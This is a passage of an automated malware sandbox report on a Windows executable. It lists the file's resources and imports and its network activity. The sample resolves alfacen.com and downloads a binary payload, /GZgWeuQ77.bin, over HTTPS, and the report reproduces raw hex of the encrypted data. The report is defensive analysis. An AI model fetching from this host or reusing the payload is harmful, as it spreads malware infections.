                                                        .rsrc0x6a0000x349080x34a00d09097303c9883a16609d6cfc168ddcdFalse0.5725671763657957data6.134346545573802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_BITMAP0x6a4000x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                        RT_ICON0x6a7680x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.39200579675854724
                                                        RT_ICON0x7af900xc890PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9980328762854472
                                                        RT_ICON0x878200x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.46636535631700654
                                                        RT_ICON0x90cc80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.49302218114602586
                                                        RT_ICON0x961500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4863013698630137
                                                        RT_ICON0x9a3780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46473029045643155
                                                        RT_ICON0x9c9200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.550187617260788
                                                        RT_ICON0x9d9c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4095744680851064
                                                        RT_DIALOG0x9de300x144dataEnglishUnited States0.5216049382716049
                                                        RT_DIALOG0x9df780x13cdataEnglishUnited States0.5506329113924051
                                                        RT_DIALOG0x9e0b80x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x9e1b80x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x9e2d80xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x9e3a00x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x9e4000x76dataEnglishUnited States0.7542372881355932
                                                        RT_VERSION0x9e4780x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.5813253012048193
                                                        RT_MANIFEST0x9e5c80x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 20, 2024 19:09:27.812395096 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:27.812450886 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:27.812555075 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:27.827723026 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:27.827749014 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:29.429107904 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:29.429223061 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:29.509888887 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:29.509919882 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:29.510845900 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:29.511445045 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:29.641005993 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:29.683448076 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.143138885 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.143157959 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.143232107 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.143256903 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.143270016 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.143296957 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.299513102 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.299587965 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.457535982 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.457604885 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.457840919 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.457890987 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.617942095 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.618024111 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.784518957 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.784646988 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.828896999 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.829080105 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.928620100 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.928734064 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:30.985232115 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:30.985322952 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:31.928946972 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:31.928961992 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:31.929054976 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:31.930002928 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:31.930073023 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.086008072 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.086107969 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.241575956 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.241678953 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.242474079 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.242539883 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.398699045 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.398792982 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.400091887 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.400146008 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.400190115 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.557626963 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.557749033 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.558819056 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.558900118 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.559295893 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.559367895 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.714088917 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.714163065 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.714884996 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.714943886 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.715958118 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.716022968 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.872096062 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.872194052 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.873126030 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.873187065 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:32.873677015 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:32.873738050 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.029438019 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.029529095 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.030471087 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.030540943 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.030767918 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.030834913 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.031735897 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.031791925 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.187561035 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.187761068 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.188127041 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.188189983 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.188612938 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.188678026 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.189570904 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.189630985 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.344813108 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.344996929 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.345324039 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.345391035 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.346215010 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.346280098 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.346290112 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.346333027 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.346364975 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.346412897 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.380670071 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.380718946 CEST44349846193.107.36.30192.168.2.4
                                                        Oct 20, 2024 19:09:33.380733013 CEST49846443192.168.2.4193.107.36.30
                                                        Oct 20, 2024 19:09:33.380772114 CEST49846443192.168.2.4193.107.36.30

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 20, 2024 19:09:27.727332115 CEST6372153192.168.2.41.1.1.1
                                                        Oct 20, 2024 19:09:27.804600954 CEST53637211.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Oct 20, 2024 19:09:27.727332115 CEST192.168.2.41.1.1.10xc960Standard query (0)alfacen.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Oct 20, 2024 19:09:27.804600954 CEST1.1.1.1192.168.2.40xc960No error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • alfacen.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449846193.107.36.304431060C:\Users\user\Desktop\450707124374000811.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-20 17:09:29 UTC161OUTGET /GZgWeuQ77.bin HTTP/1.1
                                                        User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: alfacen.com
                                                        Cache-Control: no-cache
                                                        2024-10-20 17:09:30 UTC344INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Oct 2024 17:09:29 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Fri, 18 Oct 2024 09:43:46 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 287296
                                                        Cache-Control: max-age=2592000
                                                        Expires: Tue, 19 Nov 2024 17:09:29 GMT
                                                        Vary: Accept-Encoding
                                                        Content-Type: application/octet-stream
                                                        2024-10-20 17:09:30 UTC7848INData Raw: cf c5 f8 ac f6 67 ef 06 07 f8 37 69 71 e5 d0 63 6e a7 11 60 13 f7 7c 32 98 d3 07 17 1b 04 21 a6 fc 61 21 db 82 0c 0c ba 46 57 13 cc dd 2f ce bd 43 43 ef 35 7d c0 fc 24 73 28 81 73 c3 a6 69 98 93 d8 f3 4e 6a c2 71 51 f0 c6 fc 07 f8 50 07 e1 0b f0 b4 20 98 33 d0 3c 0c 3c f2 a4 e0 52 c3 85 c1 ae f3 a8 58 8c e1 13 e9 10 56 32 c1 ed e1 41 3e 19 b6 c3 22 30 78 90 98 2a 46 7c d9 95 0d 4f 3b 89 7f d3 95 f3 70 38 31 fd 3c e2 2b b2 8e bc 0f f7 d6 61 4a 63 12 42 09 e3 2c 28 3e 2a 77 4f 82 c5 9d 08 51 bc d0 b0 72 ed cf 50 f3 4a 6b 0c 78 44 57 39 ba 8a 63 81 20 63 93 0c 8e af 85 cf c2 c3 fc a9 90 62 3a b3 59 2d 6c bb ab fb 54 6e f1 22 30 66 97 3e 79 56 a5 5d 1f 0f e0 07 14 f9 2b e4 82 f2 c7 a6 e9 67 80 9f d7 69 d9 c4 b0 37 47 52 0a c3 02 fa 36 c0 87 ea 25 2d 64 c9 a9
                                                        Data Ascii: g7iqcn`|2!a!FW/CC5}$s(siNjqQP 3<<RXV2A>"0x*F|O;p81<+aJcB,(>*wOQrPJkxDW9c cb:Y-lTn"0f>yV]+gi7GR6%-d
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 2c ce e6 06 e5 82 20 0b 06 93 db cf 18 ec ae 54 43 ca 88 70 a9 e1 bd 58 e5 d6 65 bc 1a f3 16 f4 b1 18 b0 5e 0f 1e 81 12 d3 d6 45 64 95 b8 78 50 9a 84 4f ec 12 72 a7 b8 d9 43 9f 7d ed 3b 31 2d 84 94 cc d8 0f 9e 75 cc 7f 6e 99 13 d4 61 ab bf 51 51 00 90 3a 67 14 91 53 3f 30 ea 39 c1 5d 2e 99 e4 39 e9 f7 78 f3 82 4d ab bc d6 a3 0e cf 16 47 02 d9 a8 f3 b5 78 d7 5e 01 b1 6f 57 26 fe 1d 62 73 ed e4 cf 08 b8 72 39 4b 3f 68 9b f2 a4 8d c3 06 d5 95 39 23 02 ec cb c9 d4 84 3a af d1 04 ef a8 c4 c1 33 31 de c6 cb cb 34 6a 55 a7 4b 28 44 90 05 6c fe 05 65 ea 02 76 3f 23 6e 9b c6 46 36 75 8f b2 9d 7c 80 68 d4 91 08 59 44 65 88 d5 29 b6 64 6c bc eb f9 a1 a0 0d 6c e7 14 30 9e 46 02 b8 3d 38 e9 f5 f9 d8 86 c7 b7 9c 52 ab fc de bb 45 d8 e8 a4 d8 c5 ec 5f ac 38 a6 7b c8 b9
                                                        Data Ascii: , TCpXe^EdxPOrC};1-unaQQ:gS?09].9xMGx^oW&bsr9K?h9#:314jUK(Dlev?#nF6u|hYDe)dll0F=8RE_8{
                                                        2024-10-20 17:09:30 UTC8000INData Raw: f2 ae 50 c3 29 22 6c ae a8 6f 37 25 0d 97 21 ca be 06 82 75 8d 66 e2 1a 63 c8 9c 4b 53 cb 8a 10 07 98 93 a6 25 11 92 cf 18 3b c1 7e f3 b1 cd a0 68 80 66 4d 7b 18 3e 3f fc f1 c2 4f 9d f4 7c 7c e4 ac c7 a6 87 2d 89 32 c3 a3 e7 7b 2a 63 aa 92 54 f4 ee 25 ef bd b7 8b 93 0a f1 1a a7 7f 35 dd af 3e 49 88 c1 61 01 15 5c 7a 2a c1 b5 23 87 a9 f8 24 fc d0 fb 6f f9 7d 64 92 47 b4 5d 2f 0d 8c e6 ef 97 04 51 96 a1 7b 61 65 8a 0e 0e 37 b4 31 05 39 ce 21 a1 3b be df ee de e0 5d 9d a4 85 cd 7e 9d c3 41 64 89 9e f9 8e 86 1c 07 59 5e fc 16 87 4e 73 56 a9 45 21 e8 2e d7 d6 0d 45 bb 11 5c c1 bc 29 1b fb d3 72 49 bf 9d 6a f2 bf 3b 17 b3 ec 53 d2 be 1b fa 46 79 5c db 4a d9 88 e2 0f c0 4d bf f0 44 37 41 e0 0c fd 9b 00 c1 a9 f3 a7 ce 23 50 84 f3 01 0f 19 fd e3 59 1b c9 9a 3c 2e
                                                        Data Ascii: P)"lo7%!ufcKS%;~hfM{>?O||-2{*cT%5>Ia\z*#$o}dG]/Q{ae719!;]~AdY^NsVE!.E\)rIj;SFy\JMD7A#PY<.
                                                        2024-10-20 17:09:30 UTC8000INData Raw: be 2e 90 bd 4d eb 72 de b5 1f ad 1b 04 2a 4f 2a ff 04 2b 12 c9 51 c6 db d3 49 dd 45 c9 ef d4 d9 ff ba b4 72 7e c6 23 82 1d 92 0c 69 c5 d0 b3 78 98 45 59 bc 94 20 07 9d 45 6c db 31 0a 84 e4 52 ed 6d 61 ec 6a 79 94 94 13 73 cd 49 e5 92 34 27 c4 0a b7 a7 85 00 5d d5 b0 11 8b bb 43 e1 45 7f 4c 91 d5 39 8f 83 a2 df 3c 42 c6 83 80 6c bc 94 41 36 d0 3a fa d9 a9 ab 64 2f 90 f9 7d a2 bb 12 10 d6 9e 20 d4 92 00 b4 98 d9 5c 11 44 bd d7 10 3d 3a 46 e2 bc dc 2c 14 72 6a b7 69 65 db 21 79 e6 82 72 d1 3d e2 01 aa 75 15 9d 72 90 7b a2 68 56 40 ea 3b 26 1f 6e 6c 67 7c ae 32 d8 17 c3 e0 cc 06 06 ba 90 7a e3 98 47 44 05 c0 3f 49 3b 00 e6 f1 2b a4 29 3b dc c5 a6 6c f6 31 f2 a7 f0 94 76 b4 89 5d c9 02 0b 85 7e 30 b9 ad ad a1 26 68 1f 7a f5 72 33 cc 39 01 e1 a2 02 d8 31 72 da
                                                        Data Ascii: .Mr*O*+QIEr~#ixEY El1RmajysI4']CEL9<BlA6:d/} \D=:F,rjie!yr=ur{hV@;&nlg|2zGD?I;+);l1v]~0&hzr391r
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 0a 80 72 67 3f 68 36 16 a7 4c c3 2f 6d e8 4c d4 20 df 61 28 af ab 85 7c 0f 45 30 70 7d f5 d8 d6 2b f7 f2 c7 f9 c0 4b d5 e1 ba 76 ea 7e 00 1b 5c 94 9d fe 8b 99 74 62 17 c2 68 aa 4c 0b a4 37 ac 2d 17 63 43 8c 6d 85 82 79 aa 49 84 2a 62 2e 1e bc 77 27 5c d8 ee 9a 3d 9e be f0 55 b1 bc de 25 04 a6 fe 3e 62 c9 70 21 be b6 a2 f8 ed 99 63 81 2b d0 7e ed 61 fe 0c 9f b0 23 a2 06 92 3f 7f 06 90 6c 3b 38 43 e3 97 96 a8 0f 92 e5 5b b3 cc 06 6b 68 37 17 53 0c 1b ef 2e ba c7 dc e6 90 c7 0b fc 34 b2 7e bf bd 7c 7e f8 ce b7 e9 ac c4 57 e5 d0 cb 1d a2 55 c6 0c ee a1 04 2c 14 cc 9b 10 c5 cc 94 bf 4c 6e 6b cf b0 64 6c 60 53 f7 ae 51 c8 80 c2 a7 76 db 03 8b ff fe 1b 0e a5 a0 0b 37 72 aa 83 cc 02 e0 0c d0 59 16 21 ff 6a 73 a4 bc 97 3a 77 53 eb 2f 51 0b 6a a1 fe 44 99 c7 72 8f
                                                        Data Ascii: rg?h6L/mL a(|E0p}+Kv~\tbhL7-cCmyI*b.w'\=U%>bp!c+~a#?l;8C[kh7S.4~|~WU,Lnkdl`SQv7rY!js:wS/QjDr
                                                        2024-10-20 17:09:30 UTC8000INData Raw: f6 eb eb 54 c2 dd 5d ad c6 8a 8d 4d a2 88 8a db 68 2b 3a 35 24 86 28 8e f8 cb b4 3d 77 ef 6f f0 8d cd 43 a6 19 bb ce 67 ad c6 e4 f7 c0 be 27 89 15 0c 6e eb 30 ba b2 18 8a d0 e8 05 ac 7e aa 93 93 5e df 2c 66 0c 4a f6 39 c3 02 a0 b9 86 4f 66 47 3f 13 45 da a8 78 6c d1 82 56 8a fc 70 e6 58 74 30 d2 56 17 24 8d bd 00 a1 62 33 82 84 7e 92 ad 25 77 00 b0 89 d4 1b dc 75 1f 13 75 c1 32 e6 88 0d 5d 96 23 61 08 71 b4 98 b9 7b d0 d4 d8 21 b6 21 3e 6b 32 c2 08 ee 28 cb 08 74 b3 f6 9e 54 ad 5b 1e 00 31 0e 26 4f dd 06 22 f3 4a a7 84 64 a1 46 15 35 45 02 89 6b 22 58 ad 13 5a 51 4d ca 86 12 09 db 77 f1 04 fe 32 76 49 cd cf 79 76 4d cd 6f c9 c8 31 76 92 c1 49 32 4d 05 b9 26 55 83 70 e7 bc e7 75 33 53 a1 da d8 03 a1 31 57 c8 3c 28 23 62 75 22 90 a0 61 f8 13 29 09 ae b8 8b
                                                        Data Ascii: T]Mh+:5$(=woCg'n0~^,fJ9OfG?ExlVpXt0V$b3~%wuu2]#aq{!!>k2(tT[1&O"JdF5Ek"XZQMw2vIyvMo1vI2M&Upu3S1W<(#bu"a)
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 8d 1b 25 c3 75 d9 7d a0 e8 73 64 cc d7 33 b7 9c 88 90 32 d3 4b 6b 81 9b 73 08 d7 92 1d b8 b2 09 54 fa 3c c4 aa bb f3 cf d4 16 b4 70 61 0e 2e df 2a d4 b6 1b 2b 3e d3 0b 77 69 17 2d 79 20 22 b2 77 23 c4 d3 8f 6a 9b 63 ce c3 a3 de 1a 5a 93 4c 6a 3b 01 14 98 e3 fa 38 e2 cc 53 dc 83 94 24 0f d8 5c 85 f3 73 6b ec ca bb 03 61 ce 77 f6 9b f0 d9 02 61 aa e1 bd 1d 82 9b 28 a5 5c 98 2d a7 c6 e4 ed 2b f2 8d 5d 22 0b 0d d9 b4 f8 26 99 0e bc 13 d6 51 f4 4f f8 4c e5 ca 23 54 a1 f7 57 a7 7d da d8 a3 fb 60 cf 1b 27 ab 0b a9 f9 69 1e 77 20 04 d5 21 93 42 18 1e fc 78 f4 eb 98 30 3e 1e 99 b8 9b 3c ea 6d 0c b2 d9 80 38 04 91 1f 80 2f 3b 5c 2e 23 ba cf b9 ff eb 5d 11 fb c1 30 fb db ec cd b5 12 51 b5 0a 43 9a 69 1f 5e a8 30 ec b2 04 c4 55 f7 7a 14 39 0f eb 7f bc 75 fe ed 94 cc
                                                        Data Ascii: %u}sd32KksT<pa.*+>wi-y "w#jcZLj;8S$\skawa(\-+]"&QOL#TW}`'iw !Bx0><m8/;\.#]0QCi^0Uz9u
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 6d f9 e9 e8 0e d0 bd 12 4c 17 9a e6 f1 c5 6f 85 9b 86 c5 60 37 58 6a c8 42 9c 66 50 c6 52 d6 67 1d 63 ee 40 69 f3 cd 38 14 5a 43 5c d0 59 84 ef f7 7d a5 51 31 f1 52 f6 f5 f5 70 26 06 11 92 94 19 b0 bd 4e 99 c5 33 49 29 70 e9 24 40 50 2f 13 62 b3 0e 68 56 be 1b d0 62 76 47 b4 47 e3 a6 3f 7d a8 21 bb 9f 37 e2 90 15 b6 5c c0 a8 c7 48 85 9e ec a0 91 93 6b 73 82 1a 81 ca 6f 42 1a a3 60 bc 63 b9 45 24 df 06 43 3f 7a d5 9f e5 a9 cc 2b 6b f7 66 ca de 62 25 d2 9b 44 fb 86 d2 9e f1 99 84 8a d9 16 68 32 63 d4 0a 6c 99 a3 c5 0f 70 dd 68 98 ef f4 d3 e5 62 9a 8e 7e 62 b7 93 f3 c4 f2 e4 2f e5 94 56 bd 02 19 1d 0b 79 51 81 2d 45 32 7f 86 5a e0 af d9 c9 08 a3 15 d7 89 48 fe 02 0e 7a 53 cc ed 64 06 19 bd ff 5a 50 04 76 0d 5b 57 e6 51 91 36 8b 44 c2 64 e1 02 f2 d4 ad 80 d8
                                                        Data Ascii: mLo`7XjBfPRgc@i8ZC\Y}Q1Rp&N3I)p$@P/bhVbvGG?}!7\HksoB`cE$C?z+kfb%Dh2clphb~b/VyQ-E2ZHzSdZPv[WQ6Dd
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 39 0c 3a 49 2d bf e3 98 2e 53 96 bc 7a 9e fa 61 6f 7e 06 21 a8 17 5b c0 f2 68 b0 0b 7f 4a 42 91 5d 9f ce 92 4c 53 a5 87 d8 dd 97 50 45 ae 22 a6 1c e3 eb c6 19 47 1a 1b 04 b6 f7 49 66 6b 1e 75 5b 6f f0 5b 5a bf 59 45 ac 93 28 83 a1 3b 99 a6 f7 52 68 cd 6d a6 81 6b 65 fe f8 2a f7 0a eb 16 5d 05 04 d1 62 ea b2 e3 21 71 12 25 73 40 36 65 66 3f d4 c4 0a 3b 03 62 51 5a 1a a7 95 ad f3 41 b3 25 fe 49 3e 37 ce 57 24 60 6c 88 d4 04 45 47 87 b2 3e 46 64 50 66 a9 6e 85 b9 b8 0b 6d c1 d0 51 d7 22 24 85 96 53 c9 5f 4f fb ca 65 de 48 6d a7 fd 60 0d c8 34 29 e3 fa ff e3 6d 23 30 f1 99 e3 32 fa 53 0b d1 30 fe a5 e6 34 d9 5b e5 22 af 61 3a 2c 4b 9b 75 16 0d a5 f0 e6 a1 76 77 1d 0d 55 3b 5a 37 0f 64 4c 0c fe 69 21 86 f3 f8 d7 ba 59 b6 28 6a 69 f7 78 77 45 cc 2c 00 b0 20 cf
